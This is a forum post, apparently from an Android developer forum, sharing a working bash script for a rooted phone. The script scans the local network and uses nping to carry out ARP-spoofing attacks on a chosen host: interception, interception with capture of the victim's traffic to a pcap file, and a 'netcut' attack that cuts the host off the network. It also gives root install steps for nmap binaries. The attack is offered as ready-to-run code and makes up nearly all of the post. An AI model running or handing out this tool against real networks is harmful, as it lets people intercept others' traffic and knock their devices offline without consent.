Hello everybody
Sorry in advance for my English, I'm French.
My main phone is broken, so I have an old Galaxy Mini (Android Gingerbread) as a replacement, and I want to use it for some MITM (ARP spoofing) and information gathering, but the Play Store apps are not compatible or are buggy for me.
The script works for me, but the way it finds the local IP / gateway IP may differ between phones or Android versions.
I'm posting the script here in case it gives someone ideas.
So I used the nmap ARM binaries from the nmap website (nmap/nping) to create a little script (182 lines) that automates the MITM; it is very lightweight and easy to use.
Requirement
Features
Installation binaries
Tools mitm.bash
Sorry in advance for my English, I'm French.
My main phone is broken, so I have an old Galaxy Mini (Android Gingerbread) as a replacement, and I want to use it for some MITM (ARP spoofing) and information gathering, but the Play Store apps are not compatible or are buggy for me.
The script works for me, but the way it finds the local IP / gateway IP may differ between phones or Android versions.
I'm posting the script here in case it gives someone ideas.
So I used the nmap ARM binaries from the nmap website (nmap/nping) to create a little script (182 lines) that automates the MITM; it is very lightweight and easy to use.
Requirement
- rooted phone
- busybox
- tcpdump
- bash
Features
- MITM ARP spoofing (restores the original gateway MAC in the victim's ARP cache after the attack). Note that only the victim's ARP cache is poisoned, so only victim -> gateway traffic passes through the phone; the gateway's replies still go straight to the victim.
- MITM ARP spoofing with tcpdump logging the traffic to a pcap file (restores the original gateway MAC after the attack)
- Netcut: replaces the gateway MAC in the victim's ARP cache with a bogus MAC address and forwards nothing, which cuts the victim off the network (restores the original gateway MAC after the attack)
Installation binaries
Code:
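# Install the nmap/nping ARM binaries into /system/xbin (run as root).
#
# The original post fetched the tarball through a link shortener over plain
# HTTP; fetch it from nmap.org directly instead.  These binaries end up
# running as root, so verify the archive against the hash / GPG signature
# published on nmap.org before copying anything into /system.
# If your busybox wget has no TLS support, download on a PC and push the file
# to /sdcard/opt instead of running the wget line.
NMAP_VERSION="6.46"
NMAP_TARBALL="nmap-${NMAP_VERSION}-android-arm-bin.tar.bz2"
NMAP_URL="https://nmap.org/dist/${NMAP_TARBALL}"

mkdir -p /sdcard/opt && cd /sdcard/opt || { echo "cannot use /sdcard/opt" >&2; false; }
# get binary from nmap website
wget -O "$NMAP_TARBALL" "$NMAP_URL"
# TODO: check the tarball (sha256sum / gpg --verify) against nmap.org here,
# before it is unpacked and installed as root.
tar xvjf "$NMAP_TARBALL"
# Installation to /system/xbin: remount writable only for the copy and put it
# back read-only even if the copy fails.
cd "nmap-${NMAP_VERSION}" \
  && mount -o remount,rw /system \
  && { cp -v bin/nmap bin/nping /system/xbin/ \
       && chmod 755 /system/xbin/nmap /system/xbin/nping
       # Restore /system permission
       mount -o remount,ro /system; }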
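#!/bin/bash
# mitm.bash - interactive ARP-spoofing helper for a rooted Android phone
# (original by c0derz67, forum.xda-developers.com).
#
# What it does:
#   * finds the gateway, own IP and own MAC of $MAIN_INTERFACE,
#   * ping-scans the local /24 with nmap and lists the ARP table,
#   * lets you pick one host and one of three attacks driven by nping:
#       1) ARP spoofing MITM: the victim is told the gateway IP lives at this
#          phone's MAC; ip_forward is switched on so the victim keeps working
#          while its gateway-bound traffic crosses this phone,
#       2) same as 1) plus a tcpdump capture to $PCAP_FILE,
#       3) "netcut": the victim is told the gateway lives at a bogus MAC
#          ($NETCUT_MAC) and nothing is forwarded, so it loses the network.
#   * when an attack stops (key press, Ctrl-C or any other exit) the victim's
#     ARP cache is repaired with the real gateway MAC, ip_forward is put back
#     to the value found at start-up and the temp directory is removed.
#
# Limits worth knowing:
#   * only the victim's ARP cache is poisoned (sender-ip = gateway, sent to the
#     victim).  The gateway is never told anything, so only victim -> gateway
#     traffic passes through this phone; replies go straight to the victim.
#   * the scan range assumes a /24 around your own address.
#   * an attack is refused when the gateway's MAC is not in the ARP table,
#     because the victim could not be un-poisoned afterwards.
#
# Requirements: rooted phone (run as root), busybox, bash, nmap + nping in PATH,
# tcpdump for attack 2.  ARP spoofing disrupts other people's traffic: use it
# only on networks you own or are explicitly authorised to test.

MAIN_INTERFACE="wlan0"          # change to your Wi-Fi interface name
TMP_BASE="/sdcard"              # change if your sdcard is mounted elsewhere
PCAP_FILE="/sdcard/dump.pcap"   # capture file written by attack 2
NETCUT_MAC="cc:cc:cc:cc:cc:cc"  # bogus gateway MAC used by attack 3
IP_FORWARD_FILE="/proc/sys/net/ipv4/ip_forward"

# Runtime state; global because cleanup() runs from the EXIT trap.
TMP_DIRECTORY=""
GATEWAY="" GATEWAY_MAC="" MY_ADDRESS="" MY_MAC=""
TARGET_IP="" TARGET_MAC=""
PID_nping="" PID_tcpdump=""
HOST_IPS=() HOST_MACS=()   # ARP table entries, index i <-> menu entry i+1
ATTACK_RUNNING=0           # 1 while a victim's ARP cache is poisoned
ORIG_IP_FORWARD=""         # ip_forward value found at start-up
FORWARDING_CHANGED=0       # 1 while we have switched ip_forward on

# Print a message on stderr and exit (the EXIT trap does the cleanup).
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

# True when $1 looks like a dotted-quad IPv4 address.
is_ipv4() {
  [[ "$1" =~ ^[0-9]+(\.[0-9]+){3}$ ]]
}

# True when $1 looks like a colon-separated MAC address.
is_mac() {
  [[ "$1" =~ ^[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}$ ]]
}

# Stop a background job gently (TERM, then reap it).  Background jobs in a
# non-interactive shell ignore Ctrl-C, so they must be killed explicitly.
stop_pid() {
  local pid=$1
  [[ -n "$pid" ]] || return 0
  kill "$pid" 2>/dev/null
  wait "$pid" 2>/dev/null
}

# Write $1 (0 or 1) to net.ipv4.ip_forward.  sysctl is what the original used;
# writing /proc directly is the fallback for toolboxes without sysctl.
set_ip_forward() {
  local value=$1
  echo "[*] Set net.ipv4.ip_forward -> $value"
  if command -v sysctl >/dev/null 2>&1; then
    sysctl -w "net.ipv4.ip_forward=$value"
  else
    echo "$value" > "$IP_FORWARD_FILE"
  fi
}

# Send the victim a few ARP replies carrying the real gateway MAC so its cache
# is repaired.  Needs GATEWAY_MAC; callers check that before attacking.
restore_gateway_mac() {
  [[ -n "$TARGET_IP" && -n "$TARGET_MAC" && -n "$GATEWAY_MAC" ]] || return 0
  echo "[*] Restore gateway original mac"
  nping --arp --arp-type ARP-reply --arp-sender-ip "$GATEWAY" \
        --arp-sender-mac "$GATEWAY_MAC" --dest-mac "$TARGET_MAC" \
        "$TARGET_IP" -c 10
}

# Undo everything an attack changed: kill tcpdump/nping, un-poison the victim
# and put ip_forward back.  Safe to call when nothing is running.
stop_attack() {
  if [[ -n "$PID_tcpdump" ]]; then
    echo "[*] kill tcpdump"
    stop_pid "$PID_tcpdump"
    PID_tcpdump=""
  fi
  if [[ -n "$PID_nping" ]]; then
    echo "[*] kill nping"
    stop_pid "$PID_nping"
    PID_nping=""
  fi
  if (( ATTACK_RUNNING )); then
    restore_gateway_mac
    ATTACK_RUNNING=0
  fi
  if (( FORWARDING_CHANGED )); then
    set_ip_forward "$ORIG_IP_FORWARD"
    FORWARDING_CHANGED=0
  fi
}

# EXIT trap: runs on normal exit, die(), Ctrl-C and TERM.
cleanup() {
  trap - EXIT INT TERM HUP QUIT
  stop_attack
  if [[ -n "$TMP_DIRECTORY" && -d "$TMP_DIRECTORY" ]]; then
    echo "Bye bye :) remove $TMP_DIRECTORY"
    cd / || true
    rm -r -- "$TMP_DIRECTORY"
  fi
}

# Fill GATEWAY, MY_ADDRESS and MY_MAC from `ip route` / `busybox ifconfig`.
# The parsing is the one that worked on the author's Gingerbread phone and may
# need adjusting on other Android versions; every value is validated so a
# parsing failure stops the script instead of feeding garbage to nping.
discover_network() {
  echo "[*] GET GATEWAY "
  GATEWAY=$(ip route show | grep "$MAIN_INTERFACE" | grep -o -E "via.*dev" \
            | cut -d ' ' -f2 | head -n 1)
  is_ipv4 "$GATEWAY" || die "ERROR TO GET GATEWAY"
  echo " -> GATEWAY IS $GATEWAY"

  echo "[*] GET ADRESS "
  MY_ADDRESS=$(ip route show | grep "$MAIN_INTERFACE" | grep -o -E "src .*" \
               | cut -d ' ' -f2 | head -n 1)
  is_ipv4 "$MY_ADDRESS" || die "ERROR TO GET ADDRESS"
  echo " -> MY_ADDRESS IS $MY_ADDRESS"

  echo "[*] Get Mac address : "
  MY_MAC=$(busybox ifconfig "$MAIN_INTERFACE" | grep -E -o "HWaddr .*" \
           | cut -d ' ' -f2 | head -n 1)
  is_mac "$MY_MAC" || die "UNABLE TO GET mac ADDR"
  echo " -> Mac address is : $MY_MAC"
}

# Ping-scan the /24 around MY_ADDRESS so the ARP table gets populated.
scan_network() {
  local scan_range="${MY_ADDRESS%.*}.1-255"   # assumes a /24
  echo "[*] Scan : $scan_range "
  nmap -n -v -sP "$scan_range" | grep -v down
  printf '\n\n'
}

# Parse `arp -n -a` into HOST_IPS/HOST_MACS and pick up GATEWAY_MAC.
# Lines without both an IP and a MAC (e.g. incomplete entries) are skipped.
load_arp_table() {
  local line ip mac
  local re_ip='([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'
  local re_mac='([0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5})'

  HOST_IPS=()
  HOST_MACS=()
  GATEWAY_MAC=""
  arp -n -a | grep -v incomplete > ARP_RESULT.txt
  while IFS= read -r line; do
    [[ "$line" =~ $re_ip ]] || continue
    ip=${BASH_REMATCH[1]}
    [[ "$line" =~ $re_mac ]] || continue
    mac=${BASH_REMATCH[1]}
    if [[ "$ip" == "$GATEWAY" ]]; then
      GATEWAY_MAC=$mac
    fi
    HOST_IPS+=("$ip")
    HOST_MACS+=("$mac")
  done < ARP_RESULT.txt
  (( ${#HOST_IPS[@]} > 0 )) || die "No hosts found in the ARP table"
}

# Print the numbered host menu.
list_hosts() {
  local i
  echo "[*] DEVICE(S) connected to network : "
  printf '\n'
  for (( i = 0; i < ${#HOST_IPS[@]}; i++ )); do
    echo "$(( i + 1 )) ) ${HOST_IPS[i]} ( ${HOST_MACS[i]} ) "
  done
  printf '\n'
}

# Poison TARGET_IP, wait for a key press, then undo it.
# $1: mitm | dump | netcut  (attacks 1, 2 and 3 of the menu)
run_attack() {
  local mode=$1
  local spoof_mac=$MY_MAC
  local -a nping_cmd

  if [[ -z "$GATEWAY_MAC" ]]; then
    echo "[!] Gateway $GATEWAY is not in the ARP table, the victim could not be restored afterwards: refusing to attack"
    return 1
  fi

  clear
  case "$mode" in
    mitm)
      echo "[*] Start 1) Arp Spoofing MITM (Catch and Redirect trafic to gateway)"
      ;;
    dump)
      echo "[*] Start 2) MITM and dump all trafic to $PCAP_FILE (required tcpdump)"
      if ! command -v tcpdump >/dev/null 2>&1; then
        echo "[!] tcpdump not found in PATH"
        return 1
      fi
      ;;
    netcut)
      echo "[*] Start 3) Netcut Arp Spoofing replace gateway mac to invalid mac"
      spoof_mac=$NETCUT_MAC
      ;;
    *)
      echo "[!] unknown attack mode: $mode"
      return 1
      ;;
  esac
  echo "[?] Press any key to stop "
  sleep 3

  # Attacks 1 and 2 must forward, otherwise the victim is simply cut off
  # (the original script forgot this for attack 2).  Netcut wants no forwarding.
  if [[ "$mode" != "netcut" ]]; then
    set_ip_forward 1
    FORWARDING_CHANGED=1
  fi

  nping_cmd=(nping --arp --arp-type ARP-reply --arp-sender-ip "$GATEWAY"
             --arp-sender-mac "$spoof_mac" --dest-mac "$TARGET_MAC"
             "$TARGET_IP" -c 99999)
  ATTACK_RUNNING=1
  if [[ "$mode" == "dump" ]]; then
    "${nping_cmd[@]}" > log_nping.txt 2>&1 &
    PID_nping=$!
    sleep 5
    echo "Let's see what nping say log_nping.txt : "
    printf '\n\n'
    cat log_nping.txt
    printf '\n\n'
    echo "[*] Arp spoofing (nping) running in background see $TMP_DIRECTORY/log_nping.txt for detail"
    echo "[*] Running tcpdump exclude $MY_ADDRESS packet"
    # 'not host' keeps this phone's own traffic out of the capture; forwarded
    # victim packets still carry the victim's / remote IPs, so they are kept.
    tcpdump -i "$MAIN_INTERFACE" -s0 -v -w "$PCAP_FILE" not host "$MY_ADDRESS" &
    PID_tcpdump=$!
  else
    "${nping_cmd[@]}" &
    PID_nping=$!
  fi

  read -r -n 1
  printf '\n\n'
  echo "********* STOP ATTACK *********"
  stop_attack
  read -r -p "Wait to continue"
}

main() {
  local tool choice attack i

  echo "*** Tools create by c0derz67 from forum.xda-developers.com ****"
  printf '\n\n'

  [[ "$(id -u 2>/dev/null)" == "0" ]] || die "This script must run as root (su first)"
  for tool in ip arp busybox nmap nping; do
    command -v "$tool" >/dev/null 2>&1 || die "Required tool not found in PATH: $tool"
  done

  # Unpredictable temp dir instead of /sdcard/_nettools_$RANDOM.
  TMP_DIRECTORY=$(mktemp -d "$TMP_BASE/_nettools_XXXXXX") \
    || die "Can't create a temp directory under $TMP_BASE"
  cd "$TMP_DIRECTORY" || die "Can't chdir to $TMP_DIRECTORY"
  # From here on every exit path (including Ctrl-C) goes through cleanup().
  trap cleanup EXIT
  trap 'exit 1' INT TERM HUP QUIT

  # Remembered so stop_attack()/cleanup() can put forwarding back.
  ORIG_IP_FORWARD=$(cat "$IP_FORWARD_FILE" 2>/dev/null)

  discover_network
  scan_network
  load_arp_table

  while true; do
    list_hosts
    # Whole line, not one character: more than 9 hosts must stay selectable.
    read -r -p "[*] Select target ( 1-${#HOST_IPS[@]} ) : " choice
    echo ""
    if ! [[ "$choice" =~ ^[0-9]+$ ]] \
       || (( 10#$choice < 1 || 10#$choice > ${#HOST_IPS[@]} )); then
      echo "$choice is not a good target"
      continue
    fi
    i=$(( 10#$choice - 1 ))
    TARGET_IP=${HOST_IPS[i]}
    TARGET_MAC=${HOST_MACS[i]}

    printf '\n\n'
    echo "[*] Select attack : "
    printf '\n'
    echo "1) Arp Spoofing MITM (Catch and Redirect trafic to gateway) "
    echo "2) MITM and dump all trafic to $PCAP_FILE (required tcpdump)"
    echo "3) Netcut Arp Spoofing replace gateway mac to invalid mac "
    printf '\n'
    read -r -n 1 -p "[*] Attack type : " attack
    echo ""
    case "$attack" in
      1) run_attack mitm ;;
      2) run_attack dump ;;
      3) run_attack netcut ;;
      *) echo "$attack is not a valid attack type" ;;
    esac
  done
}

main "$@"

# ARP poisoning reference (what nping is asked to send):
# nping --arp --arp-type ARP-reply --arp-sender-ip (GATEWAY IP) --arp-sender-mac (ATTACKER MAC) --dest-mac (VICTIM MAC) (VICTIM IP) -c 999999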